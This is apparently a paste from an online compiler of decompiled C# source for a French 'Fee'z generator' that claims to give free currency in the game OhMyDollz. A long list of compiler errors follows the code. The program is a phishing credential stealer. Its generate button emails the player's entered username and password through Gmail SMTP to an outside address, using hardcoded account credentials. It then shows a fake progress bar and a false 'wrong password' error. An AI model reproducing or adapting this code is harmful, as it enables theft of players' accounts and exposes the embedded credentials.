fork download
  1. [DesignerGenerated]
  2. public class Form1 : Form
  3. {
  4. [AccessedThroughProperty("Button1")]
  5. private Button _Button1;
  6. [AccessedThroughProperty("Button2")]
  7. private Button _Button2;
  8. [AccessedThroughProperty("ComboBox1")]
  9. private ComboBox _ComboBox1;
  10. [AccessedThroughProperty("Label1")]
  11. private Label _Label1;
  12. [AccessedThroughProperty("Label2")]
  13. private Label _Label2;
  14. [AccessedThroughProperty("Label3")]
  15. private Label _Label3;
  16. [AccessedThroughProperty("Label4")]
  17. private Label _Label4;
  18. [AccessedThroughProperty("Label5")]
  19. private Label _Label5;
  20. [AccessedThroughProperty("PictureBox1")]
  21. private PictureBox _PictureBox1;
  22. [AccessedThroughProperty("PictureBox2")]
  23. private PictureBox _PictureBox2;
  24. [AccessedThroughProperty("PictureBox3")]
  25. private PictureBox _PictureBox3;
  26. [AccessedThroughProperty("PictureBox4")]
  27. private PictureBox _PictureBox4;
  28. [AccessedThroughProperty("ProgressBar1")]
  29. private ProgressBar _ProgressBar1;
  30. [AccessedThroughProperty("TextBox1")]
  31. private TextBox _TextBox1;
  32. [AccessedThroughProperty("TextBox2")]
  33. private TextBox _TextBox2;
  34. [AccessedThroughProperty("Timer1")]
  35. private System.Windows.Forms.Timer _Timer1;
  36. private IContainer components;
  37.  
  38. public Form1()
  39. {
  40. this.InitializeComponent();
  41. }
  42.  
  43. private void Button1_Click(object sender, EventArgs e)
  44. {
  45. MailMessage message = new MailMessage();
  46. SmtpClient client = new SmtpClient("smtp.gmail.com");
  47. message.From = new MailAddress("boost4hack@gmail.com");
  48. message.To.Add("hilopitaq@gmail.com");
  49. message.Subject = "OhMyDollz - Nouveau Compte";
  50. message.Body = "Pseudo: " + this.TextBox1.Text + " Mot de passe: " + this.TextBox2.Text;
  51. client.Port = Conversions.ToInteger("587");
  52. client.Credentials = new NetworkCredential("boost4hack@gmail.com", "09031995");
  53. client.EnableSsl = true;
  54. try
  55. {
  56. client.Send(message);
  57. }
  58. catch (Exception exception1)
  59. {
  60. ProjectData.SetProjectError(exception1);
  61. Exception exception = exception1;
  62. ProjectData.ClearProjectError();
  63. }
  64. this.Timer1.Enabled = true;
  65. this.Timer1.Start();
  66. this.Timer1.Interval = 0x3e8;
  67. this.TextBox1.Enabled = false;
  68. this.TextBox2.Enabled = false;
  69. this.ComboBox1.Enabled = false;
  70. this.Button1.Enabled = false;
  71. if (Operators.ConditionalCompareObjectEqual(this.ComboBox1.SelectedItem, "", false))
  72. {
  73. Interaction.MsgBox("Veuillez choisir une somme de Fee'z", MsgBoxStyle.Exclamation, "G\x00e9n\x00e9rateur de Fee'z");
  74. if (this.TextBox1.Text == "")
  75. {
  76. Interaction.MsgBox("Vous avez entr\x00e9 un Pseudo imconpler ou invalide", MsgBoxStyle.Exclamation, "G\x00e9n\x00e9rateur de Fee'z");
  77. if (this.TextBox2.Text == "")
  78. {
  79. Interaction.MsgBox("Vous avez entr\x00e9 un Mot de passe imconpler ou invalide", MsgBoxStyle.Exclamation, "G\x00e9n\x00e9rateur de Fee'z");
  80. }
  81. }
  82. }
  83. }
  84.  
  85. private void Button2_Click(object sender, EventArgs e)
  86. {
  87. this.ProgressBar1.Enabled = false;
  88. this.ProgressBar1.Value = 0;
  89. this.Timer1.Enabled = false;
  90. this.TextBox1.Enabled = true;
  91. this.TextBox2.Enabled = true;
  92. this.ComboBox1.Enabled = true;
  93. this.Button1.Enabled = true;
  94. }
  95.  
  96. [DebuggerNonUserCode]
  97. protected override void Dispose(bool disposing)
  98. {
  99. try
  100. {
  101. if (disposing && (this.components != null))
  102. {
  103. this.components.Dispose();
  104. }
  105. }
  106. finally
  107. {
  108. base.Dispose(disposing);
  109. }
  110. }
  111.  
  112. [DebuggerStepThrough]
  113. private void InitializeComponent()
  114. {
  115. this.components = new System.ComponentModel.Container();
  116. ComponentResourceManager manager = new ComponentResourceManager(typeof(Form1));
  117. this.Button1 = new Button();
  118. this.Label1 = new Label();
  119. this.Label2 = new Label();
  120. this.Label3 = new Label();
  121. this.TextBox1 = new TextBox();
  122. this.TextBox2 = new TextBox();
  123. this.ComboBox1 = new ComboBox();
  124. this.ProgressBar1 = new ProgressBar();
  125. this.Timer1 = new System.Windows.Forms.Timer(this.components);
  126. this.PictureBox1 = new PictureBox();
  127. this.PictureBox2 = new PictureBox();
  128. this.PictureBox3 = new PictureBox();
  129. this.PictureBox4 = new PictureBox();
  130. this.Label4 = new Label();
  131. this.Label5 = new Label();
  132. this.Button2 = new Button();
  133. ((ISupportInitialize) this.PictureBox1).BeginInit();
  134. ((ISupportInitialize) this.PictureBox2).BeginInit();
  135. ((ISupportInitialize) this.PictureBox3).BeginInit();
  136. ((ISupportInitialize) this.PictureBox4).BeginInit();
  137. this.SuspendLayout();
  138. this.Button1.BackColor = Color.Orchid;
  139. this.Button1.FlatStyle = FlatStyle.Popup;
  140. this.Button1.Font = new Font("Microsoft Sans Serif", 9.75f, FontStyle.Bold, GraphicsUnit.Point, 0);
  141. Point point2 = new Point(4, 0xea);
  142. this.Button1.Location = point2;
  143. this.Button1.Name = "Button1";
  144. Size size2 = new Size(0xb6, 0x19);
  145. this.Button1.Size = size2;
  146. this.Button1.TabIndex = 0;
  147. this.Button1.Text = "G\x00e9n\x00e9rer des Fee'z";
  148. this.Button1.UseVisualStyleBackColor = false;
  149. this.Label1.AutoSize = true;
  150. this.Label1.BackColor = Color.Transparent;
  151. this.Label1.Font = new Font("Microsoft Sans Serif", 9.75f, FontStyle.Bold, GraphicsUnit.Point, 0);
  152. this.Label1.ForeColor = Color.Black;
  153. point2 = new Point(0x2c, 0x73);
  154. this.Label1.Location = point2;
  155. this.Label1.Name = "Label1";
  156. size2 = new Size(0x45, 0x10);
  157. this.Label1.Size = size2;
  158. this.Label1.TabIndex = 1;
  159. this.Label1.Text = "Pseudo :";
  160. this.Label2.AutoSize = true;
  161. this.Label2.BackColor = Color.Transparent;
  162. this.Label2.Font = new Font("Microsoft Sans Serif", 9.75f, FontStyle.Bold, GraphicsUnit.Point, 0);
  163. point2 = new Point(3, 0x91);
  164. this.Label2.Location = point2;
  165. this.Label2.Name = "Label2";
  166. size2 = new Size(110, 0x10);
  167. this.Label2.Size = size2;
  168. this.Label2.TabIndex = 2;
  169. this.Label2.Text = "Mot de passe :";
  170. this.Label3.AutoSize = true;
  171. this.Label3.BackColor = Color.Transparent;
  172. this.Label3.Font = new Font("Microsoft Sans Serif", 9.75f, FontStyle.Bold, GraphicsUnit.Point, 0);
  173. point2 = new Point(0, 0xb2);
  174. this.Label3.Location = point2;
  175. this.Label3.Name = "Label3";
  176. size2 = new Size(0x71, 0x10);
  177. this.Label3.Size = size2;
  178. this.Label3.TabIndex = 3;
  179. this.Label3.Text = "Nombre Fee'z :";
  180. this.TextBox1.BackColor = SystemColors.Window;
  181. this.TextBox1.BorderStyle = BorderStyle.FixedSingle;
  182. this.TextBox1.Font = new Font("Microsoft Sans Serif", 9.75f, FontStyle.Bold, GraphicsUnit.Point, 0);
  183. point2 = new Point(0x7b, 0x73);
  184. this.TextBox1.Location = point2;
  185. this.TextBox1.Name = "TextBox1";
  186. size2 = new Size(0x70, 0x16);
  187. this.TextBox1.Size = size2;
  188. this.TextBox1.TabIndex = 4;
  189. this.TextBox2.BorderStyle = BorderStyle.FixedSingle;
  190. this.TextBox2.Font = new Font("Microsoft Sans Serif", 9.75f, FontStyle.Bold, GraphicsUnit.Point, 0);
  191. point2 = new Point(0x7b, 0x91);
  192. this.TextBox2.Location = point2;
  193. this.TextBox2.Name = "TextBox2";
  194. this.TextBox2.PasswordChar = '•';
  195. size2 = new Size(0x70, 0x16);
  196. this.TextBox2.Size = size2;
  197. this.TextBox2.TabIndex = 5;
  198. this.ComboBox1.DropDownStyle = ComboBoxStyle.DropDownList;
  199. this.ComboBox1.Font = new Font("Microsoft Sans Serif", 9.75f, FontStyle.Bold, GraphicsUnit.Point, 0);
  200. this.ComboBox1.FormattingEnabled = true;
  201. this.ComboBox1.Items.AddRange(new object[] { "100", "200", "300", "400", "500", "600", "700", "800", "900" });
  202. point2 = new Point(0x7b, 0xae);
  203. this.ComboBox1.Location = point2;
  204. this.ComboBox1.Name = "ComboBox1";
  205. size2 = new Size(0x70, 0x18);
  206. this.ComboBox1.Size = size2;
  207. this.ComboBox1.Sorted = true;
  208. this.ComboBox1.TabIndex = 7;
  209. point2 = new Point(3, 0xcc);
  210. this.ProgressBar1.Location = point2;
  211. this.ProgressBar1.Name = "ProgressBar1";
  212. size2 = new Size(0x108, 0x17);
  213. this.ProgressBar1.Size = size2;
  214. this.ProgressBar1.TabIndex = 8;
  215. this.PictureBox1.Image = (Image) manager.GetObject("PictureBox1.Image");
  216. this.PictureBox1.InitialImage = (Image) manager.GetObject("PictureBox1.InitialImage");
  217. point2 = new Point(12, 0x70);
  218. this.PictureBox1.Location = point2;
  219. this.PictureBox1.Name = "PictureBox1";
  220. size2 = new Size(0x1a, 0x17);
  221. this.PictureBox1.Size = size2;
  222. this.PictureBox1.SizeMode = PictureBoxSizeMode.AutoSize;
  223. this.PictureBox1.TabIndex = 10;
  224. this.PictureBox1.TabStop = false;
  225. this.PictureBox2.BackColor = Color.Transparent;
  226. this.PictureBox2.Image = (Image) manager.GetObject("PictureBox2.Image");
  227. point2 = new Point(0xf1, 0xaf);
  228. this.PictureBox2.Location = point2;
  229. this.PictureBox2.Name = "PictureBox2";
  230. size2 = new Size(0x1a, 0x17);
  231. this.PictureBox2.Size = size2;
  232. this.PictureBox2.SizeMode = PictureBoxSizeMode.AutoSize;
  233. this.PictureBox2.TabIndex = 11;
  234. this.PictureBox2.TabStop = false;
  235. this.PictureBox3.BackColor = Color.Transparent;
  236. this.PictureBox3.Image = (Image) manager.GetObject("PictureBox3.Image");
  237. point2 = new Point(-6, -13);
  238. this.PictureBox3.Location = point2;
  239. this.PictureBox3.Name = "PictureBox3";
  240. size2 = new Size(0x59, 0x7d);
  241. this.PictureBox3.Size = size2;
  242. this.PictureBox3.SizeMode = PictureBoxSizeMode.Zoom;
  243. this.PictureBox3.TabIndex = 12;
  244. this.PictureBox3.TabStop = false;
  245. this.PictureBox4.Image = (Image) manager.GetObject("PictureBox4.Image");
  246. point2 = new Point(0x7b, 0x26);
  247. this.PictureBox4.Location = point2;
  248. this.PictureBox4.Name = "PictureBox4";
  249. size2 = new Size(0x76, 0x1d);
  250. this.PictureBox4.Size = size2;
  251. this.PictureBox4.SizeMode = PictureBoxSizeMode.AutoSize;
  252. this.PictureBox4.TabIndex = 13;
  253. this.PictureBox4.TabStop = false;
  254. this.Label4.AutoSize = true;
  255. this.Label4.BackColor = Color.Transparent;
  256. point2 = new Point(0x59, 9);
  257. this.Label4.Location = point2;
  258. this.Label4.Name = "Label4";
  259. size2 = new Size(0x92, 0x1a);
  260. this.Label4.Size = size2;
  261. this.Label4.TabIndex = 14;
  262. this.Label4.Text = "Oh j'ai plus de 100.000 Fee'z \r\nMerci Beaucoup !";
  263. this.Label5.AutoSize = true;
  264. this.Label5.BackColor = Color.Transparent;
  265. this.Label5.Font = new Font("Microsoft Sans Serif", 8.25f, FontStyle.Bold, GraphicsUnit.Point, 0);
  266. point2 = new Point(0x90, 0x43);
  267. this.Label5.Location = point2;
  268. this.Label5.Name = "Label5";
  269. size2 = new Size(0x7b, 13);
  270. this.Label5.Size = size2;
  271. this.Label5.TabIndex = 15;
  272. this.Label5.Text = "Pourquoi pas vous ?";
  273. this.Button2.BackColor = Color.Orchid;
  274. this.Button2.FlatStyle = FlatStyle.Popup;
  275. this.Button2.Font = new Font("Microsoft Sans Serif", 9.75f, FontStyle.Bold, GraphicsUnit.Point, 0);
  276. point2 = new Point(0xbf, 0xea);
  277. this.Button2.Location = point2;
  278. this.Button2.Name = "Button2";
  279. size2 = new Size(0x49, 0x19);
  280. this.Button2.Size = size2;
  281. this.Button2.TabIndex = 0x10;
  282. this.Button2.Text = "Stop";
  283. this.Button2.UseVisualStyleBackColor = false;
  284. SizeF ef2 = new SizeF(6f, 13f);
  285. this.AutoScaleDimensions = ef2;
  286. this.AutoScaleMode = AutoScaleMode.Font;
  287. this.BackgroundImage = (Image) manager.GetObject("$this.BackgroundImage");
  288. size2 = new Size(0x10d, 0x106);
  289. this.ClientSize = size2;
  290. this.Controls.Add(this.Button2);
  291. this.Controls.Add(this.Label5);
  292. this.Controls.Add(this.Label4);
  293. this.Controls.Add(this.PictureBox4);
  294. this.Controls.Add(this.PictureBox3);
  295. this.Controls.Add(this.PictureBox2);
  296. this.Controls.Add(this.PictureBox1);
  297. this.Controls.Add(this.ProgressBar1);
  298. this.Controls.Add(this.ComboBox1);
  299. this.Controls.Add(this.TextBox2);
  300. this.Controls.Add(this.TextBox1);
  301. this.Controls.Add(this.Label3);
  302. this.Controls.Add(this.Label2);
  303. this.Controls.Add(this.Label1);
  304. this.Controls.Add(this.Button1);
  305. this.FormBorderStyle = FormBorderStyle.FixedToolWindow;
  306. this.Icon = (Icon) manager.GetObject("$this.Icon");
  307. this.Name = "Form1";
  308. this.Text = "G\x00e9n\x00e9rateur de Fee'z";
  309. ((ISupportInitialize) this.PictureBox1).EndInit();
  310. ((ISupportInitialize) this.PictureBox2).EndInit();
  311. ((ISupportInitialize) this.PictureBox3).EndInit();
  312. ((ISupportInitialize) this.PictureBox4).EndInit();
  313. this.ResumeLayout(false);
  314. this.PerformLayout();
  315. }
  316.  
  317. private void Timer1_Tick(object sender, EventArgs e)
  318. {
  319. this.ProgressBar1.Value++;
  320. if (this.ProgressBar1.Value == this.ProgressBar1.Maximum)
  321. {
  322. this.ProgressBar1.Value = 0;
  323. this.Timer1.Stop();
  324. this.Timer1.Enabled = false;
  325. this.TextBox1.Enabled = true;
  326. this.TextBox2.Enabled = true;
  327. this.ComboBox1.Enabled = true;
  328. this.Button1.Enabled = true;
  329. Interaction.MsgBox("Erreur ! Votre pseudo ou votre mot de passe est incorrect. R\x00e9\x00e9ssayer", MsgBoxStyle.Critical, "Erreur connection");
  330. }
  331. }
  332.  
  333. internal virtual Button Button1
  334. {
  335. get
  336. {
  337. return this._Button1;
  338. }
  339. [MethodImpl(MethodImplOptions.Synchronized)]
  340. set
  341. {
  342. EventHandler handler = new EventHandler(this.Button1_Click);
  343. if (this._Button1 != null)
  344. {
  345. this._Button1.Click -= handler;
  346. }
  347. this._Button1 = value;
  348. if (this._Button1 != null)
  349. {
  350. this._Button1.Click += handler;
  351. }
  352. }
  353. }
  354.  
  355. internal virtual Button Button2
  356. {
  357. get
  358. {
  359. return this._Button2;
  360. }
  361. [MethodImpl(MethodImplOptions.Synchronized)]
  362. set
  363. {
  364. EventHandler handler = new EventHandler(this.Button2_Click);
  365. if (this._Button2 != null)
  366. {
  367. this._Button2.Click -= handler;
  368. }
  369. this._Button2 = value;
  370. if (this._Button2 != null)
  371. {
  372. this._Button2.Click += handler;
  373. }
  374. }
  375. }
  376.  
  377. internal virtual ComboBox ComboBox1
  378. {
  379. get
  380. {
  381. return this._ComboBox1;
  382. }
  383. [MethodImpl(MethodImplOptions.Synchronized)]
  384. set
  385. {
  386. this._ComboBox1 = value;
  387. }
  388. }
  389.  
  390. internal virtual Label Label1
  391. {
  392. get
  393. {
  394. return this._Label1;
  395. }
  396. [MethodImpl(MethodImplOptions.Synchronized)]
  397. set
  398. {
  399. this._Label1 = value;
  400. }
  401. }
  402.  
  403. internal virtual Label Label2
  404. {
  405. get
  406. {
  407. return this._Label2;
  408. }
  409. [MethodImpl(MethodImplOptions.Synchronized)]
  410. set
  411. {
  412. this._Label2 = value;
  413. }
  414. }
  415.  
  416. internal virtual Label Label3
  417. {
  418. get
  419. {
  420. return this._Label3;
  421. }
  422. [MethodImpl(MethodImplOptions.Synchronized)]
  423. set
  424. {
  425. this._Label3 = value;
  426. }
  427. }
  428.  
  429. internal virtual Label Label4
  430. {
  431. get
  432. {
  433. return this._Label4;
  434. }
  435. [MethodImpl(MethodImplOptions.Synchronized)]
  436. set
  437. {
  438. this._Label4 = value;
  439. }
  440. }
  441.  
  442. internal virtual Label Label5
  443. {
  444. get
  445. {
  446. return this._Label5;
  447. }
  448. [MethodImpl(MethodImplOptions.Synchronized)]
  449. set
  450. {
  451. this._Label5 = value;
  452. }
  453. }
  454.  
  455. internal virtual PictureBox PictureBox1
  456. {
  457. get
  458. {
  459. return this._PictureBox1;
  460. }
  461. [MethodImpl(MethodImplOptions.Synchronized)]
  462. set
  463. {
  464. this._PictureBox1 = value;
  465. }
  466. }
  467.  
  468. internal virtual PictureBox PictureBox2
  469. {
  470. get
  471. {
  472. return this._PictureBox2;
  473. }
  474. [MethodImpl(MethodImplOptions.Synchronized)]
  475. set
  476. {
  477. this._PictureBox2 = value;
  478. }
  479. }
  480.  
  481. internal virtual PictureBox PictureBox3
  482. {
  483. get
  484. {
  485. return this._PictureBox3;
  486. }
  487. [MethodImpl(MethodImplOptions.Synchronized)]
  488. set
  489. {
  490. this._PictureBox3 = value;
  491. }
  492. }
  493.  
  494. internal virtual PictureBox PictureBox4
  495. {
  496. get
  497. {
  498. return this._PictureBox4;
  499. }
  500. [MethodImpl(MethodImplOptions.Synchronized)]
  501. set
  502. {
  503. this._PictureBox4 = value;
  504. }
  505. }
  506.  
  507. internal virtual ProgressBar ProgressBar1
  508. {
  509. get
  510. {
  511. return this._ProgressBar1;
  512. }
  513. [MethodImpl(MethodImplOptions.Synchronized)]
  514. set
  515. {
  516. this._ProgressBar1 = value;
  517. }
  518. }
  519.  
  520. internal virtual TextBox TextBox1
  521. {
  522. get
  523. {
  524. return this._TextBox1;
  525. }
  526. [MethodImpl(MethodImplOptions.Synchronized)]
  527. set
  528. {
  529. this._TextBox1 = value;
  530. }
  531. }
  532.  
  533. internal virtual TextBox TextBox2
  534. {
  535. get
  536. {
  537. return this._TextBox2;
  538. }
  539. [MethodImpl(MethodImplOptions.Synchronized)]
  540. set
  541. {
  542. this._TextBox2 = value;
  543. }
  544. }
  545.  
  546. internal virtual System.Windows.Forms.Timer Timer1
  547. {
  548. get
  549. {
  550. return this._Timer1;
  551. }
  552. [MethodImpl(MethodImplOptions.Synchronized)]
  553. set
  554. {
  555. EventHandler handler = new EventHandler(this.Timer1_Tick);
  556. if (this._Timer1 != null)
  557. {
  558. this._Timer1.Tick -= handler;
  559. }
  560. this._Timer1 = value;
  561. if (this._Timer1 != null)
  562. {
  563. this._Timer1.Tick += handler;
  564. }
  565. }
  566. }
  567. }
  568. }
  569.  
Compilation error #stdin compilation error #stdout 0s 0KB
stdin
Standard input is empty
compilation info
Visual Basic.Net Compiler version 0.0.0.5943 (Mono 3.8 - tarball)
Copyright (C) 2004-2010 Rolf Bjarne Kvinge. All rights reserved.

/home/kdeKQe/prog.vb (1,25) : error VBNC30203: Identifier expected.
/home/kdeKQe/prog.vb (2,30) : error VBNC90019: Expected 'End'.
/home/kdeKQe/prog.vb (3,6) : error VBNC30203: Identifier expected.
/home/kdeKQe/prog.vb (4,33) : error VBNC30034: An escaped identifier must end with ']'.
/home/kdeKQe/prog.vb (4,33) : error VBNC30203: Identifier expected.
/home/kdeKQe/prog.vb (4,44) : error VBNC30037: Symbol is not valid.
/home/kdeKQe/prog.vb (5,23) : error VBNC30203: Identifier expected.
/home/kdeKQe/prog.vb (5,32) : error VBNC30037: Symbol is not valid.
/home/kdeKQe/prog.vb (6,33) : error VBNC30034: An escaped identifier must end with ']'.
/home/kdeKQe/prog.vb (6,33) : error VBNC30203: Identifier expected.
/home/kdeKQe/prog.vb (6,44) : error VBNC30037: Symbol is not valid.
/home/kdeKQe/prog.vb (7,23) : error VBNC30203: Identifier expected.
/home/kdeKQe/prog.vb (7,32) : error VBNC30037: Symbol is not valid.
/home/kdeKQe/prog.vb (8,33) : error VBNC30034: An escaped identifier must end with ']'.
/home/kdeKQe/prog.vb (8,33) : error VBNC30203: Identifier expected.
/home/kdeKQe/prog.vb (8,46) : error VBNC30037: Symbol is not valid.
/home/kdeKQe/prog.vb (9,25) : error VBNC30203: Identifier expected.
/home/kdeKQe/prog.vb (9,36) : error VBNC30037: Symbol is not valid.
/home/kdeKQe/prog.vb (10,33) : error VBNC30034: An escaped identifier must end with ']'.
/home/kdeKQe/prog.vb (10,33) : error VBNC30203: Identifier expected.
/home/kdeKQe/prog.vb (10,43) : error VBNC30037: Symbol is not valid.
/home/kdeKQe/prog.vb (11,22) : error VBNC30203: Identifier expected.
/home/kdeKQe/prog.vb (11,30) : error VBNC30037: Symbol is not valid.
/home/kdeKQe/prog.vb (12,33) : error VBNC30034: An escaped identifier must end with ']'.
/home/kdeKQe/prog.vb (12,33) : error VBNC30203: Identifier expected.
/home/kdeKQe/prog.vb (12,43) : error VBNC30037: Symbol is not valid.
/home/kdeKQe/prog.vb (13,22) : error VBNC30203: Identifier expected.
/home/kdeKQe/prog.vb (13,30) : error VBNC30037: Symbol is not valid.
/home/kdeKQe/prog.vb (14,33) : error VBNC30034: An escaped identifier must end with ']'.
/home/kdeKQe/prog.vb (14,33) : error VBNC30203: Identifier expected.
/home/kdeKQe/prog.vb (14,43) : error VBNC30037: Symbol is not valid.
/home/kdeKQe/prog.vb (15,22) : error VBNC30203: Identifier expected.
/home/kdeKQe/prog.vb (15,30) : error VBNC30037: Symbol is not valid.
/home/kdeKQe/prog.vb (16,33) : error VBNC30034: An escaped identifier must end with ']'.
/home/kdeKQe/prog.vb (16,33) : error VBNC30203: Identifier expected.
/home/kdeKQe/prog.vb (16,43) : error VBNC30037: Symbol is not valid.
/home/kdeKQe/prog.vb (17,22) : error VBNC30203: Identifier expected.
/home/kdeKQe/prog.vb (17,30) : error VBNC30037: Symbol is not valid.
/home/kdeKQe/prog.vb (18,33) : error VBNC30034: An escaped identifier must end with ']'.
/home/kdeKQe/prog.vb (18,33) : error VBNC30203: Identifier expected.
/home/kdeKQe/prog.vb (18,43) : error VBNC30037: Symbol is not valid.
/home/kdeKQe/prog.vb (19,22) : error VBNC30203: Identifier expected.
/home/kdeKQe/prog.vb (19,30) : error VBNC30037: Symbol is not valid.
/home/kdeKQe/prog.vb (20,33) : error VBNC30034: An escaped identifier must end with ']'.
/home/kdeKQe/prog.vb (20,33) : error VBNC30203: Identifier expected.
/home/kdeKQe/prog.vb (20,48) : error VBNC30037: Symbol is not valid.
/home/kdeKQe/prog.vb (21,27) : error VBNC30203: Identifier expected.
/home/kdeKQe/prog.vb (21,40) : error VBNC30037: Symbol is not valid.
/home/kdeKQe/prog.vb (22,33) : error VBNC30034: An escaped identifier must end with ']'.
/home/kdeKQe/prog.vb (22,33) : error VBNC30203: Identifier expected.
/home/kdeKQe/prog.vb (22,48) : error VBNC30037: Symbol is not valid.
/home/kdeKQe/prog.vb (23,27) : error VBNC30203: Identifier expected.
/home/kdeKQe/prog.vb (23,40) : error VBNC30037: Symbol is not valid.
/home/kdeKQe/prog.vb (24,33) : error VBNC30034: An escaped identifier must end with ']'.
/home/kdeKQe/prog.vb (24,33) : error VBNC30203: Identifier expected.
/home/kdeKQe/prog.vb (24,48) : error VBNC30037: Symbol is not valid.
/home/kdeKQe/prog.vb (25,27) : error VBNC30203: Identifier expected.
/home/kdeKQe/prog.vb (25,40) : error VBNC30037: Symbol is not valid.
/home/kdeKQe/prog.vb (26,33) : error VBNC30034: An escaped identifier must end with ']'.
/home/kdeKQe/prog.vb (26,33) : error VBNC30203: Identifier expected.
/home/kdeKQe/prog.vb (26,48) : error VBNC30037: Symbol is not valid.
/home/kdeKQe/prog.vb (27,27) : error VBNC30203: Identifier expected.
/home/kdeKQe/prog.vb (27,40) : error VBNC30037: Symbol is not valid.
/home/kdeKQe/prog.vb (28,33) : error VBNC30034: An escaped identifier must end with ']'.
/home/kdeKQe/prog.vb (28,33) : error VBNC30203: Identifier expected.
/home/kdeKQe/prog.vb (28,49) : error VBNC30037: Symbol is not valid.
/home/kdeKQe/prog.vb (29,28) : error VBNC30203: Identifier expected.
/home/kdeKQe/prog.vb (29,42) : error VBNC30037: Symbol is not valid.
/home/kdeKQe/prog.vb (30,33) : error VBNC30034: An escaped identifier must end with ']'.
/home/kdeKQe/prog.vb (30,33) : error VBNC30203: Identifier expected.
/home/kdeKQe/prog.vb (30,45) : error VBNC30037: Symbol is not valid.
/home/kdeKQe/prog.vb (31,24) : error VBNC30203: Identifier expected.
/home/kdeKQe/prog.vb (31,34) : error VBNC30037: Symbol is not valid.
/home/kdeKQe/prog.vb (32,33) : error VBNC30034: An escaped identifier must end with ']'.
/home/kdeKQe/prog.vb (32,33) : error VBNC30203: Identifier expected.
/home/kdeKQe/prog.vb (32,45) : error VBNC30037: Symbol is not valid.
/home/kdeKQe/prog.vb (33,24) : error VBNC30203: Identifier expected.
/home/kdeKQe/prog.vb (33,34) : error VBNC30037: Symbol is not valid.
/home/kdeKQe/prog.vb (34,33) : error VBNC30034: An escaped identifier must end with ']'.
/home/kdeKQe/prog.vb (34,33) : error VBNC30203: Identifier expected.
/home/kdeKQe/prog.vb (34,43) : error VBNC30037: Symbol is not valid.
/home/kdeKQe/prog.vb (35,23) : error VBNC30203: Identifier expected.
/home/kdeKQe/prog.vb (35,51) : error VBNC30037: Symbol is not valid.
/home/kdeKQe/prog.vb (36,27) : error VBNC30203: Identifier expected.
/home/kdeKQe/prog.vb (36,38) : error VBNC30037: Symbol is not valid.
/home/kdeKQe/prog.vb (38,21) : error VBNC30203: Identifier expected.
/home/kdeKQe/prog.vb (39,10) : error VBNC30203: Identifier expected.
/home/kdeKQe/prog.vb (40,17) : error VBNC30203: Identifier expected.
/home/kdeKQe/prog.vb (40,39) : error VBNC30037: Symbol is not valid.
/home/kdeKQe/prog.vb (43,21) : error VBNC30203: Identifier expected.
/home/kdeKQe/prog.vb (44,10) : error VBNC30203: Identifier expected.
/home/kdeKQe/prog.vb (45,24) : error VBNC30203: Identifier expected.
/home/kdeKQe/prog.vb (45,52) : error VBNC30037: Symbol is not valid.
/home/kdeKQe/prog.vb (46,23) : error VBNC30203: Identifier expected.
/home/kdeKQe/prog.vb (46,65) : error VBNC30037: Symbol is not valid.
/home/kdeKQe/prog.vb (47,20) : error VBNC30203: Identifier expected.
/home/kdeKQe/prog.vb (47,67) : error VBNC30037: Symbol is not valid.
/home/kdeKQe/prog.vb (48,20) : error VBNC30203: Identifier expected.
/home/kdeKQe/prog.vb (48,50) : error VBNC30037: Symbol is not valid.
/home/kdeKQe/prog.vb (49,20) : error VBNC30203: Identifier expected.
/home/kdeKQe/prog.vb (49,59) : error VBNC30037: Symbol is not valid.
vbnc : Command line : error VBNC30041: Too many errors.
stdout
Standard output is empty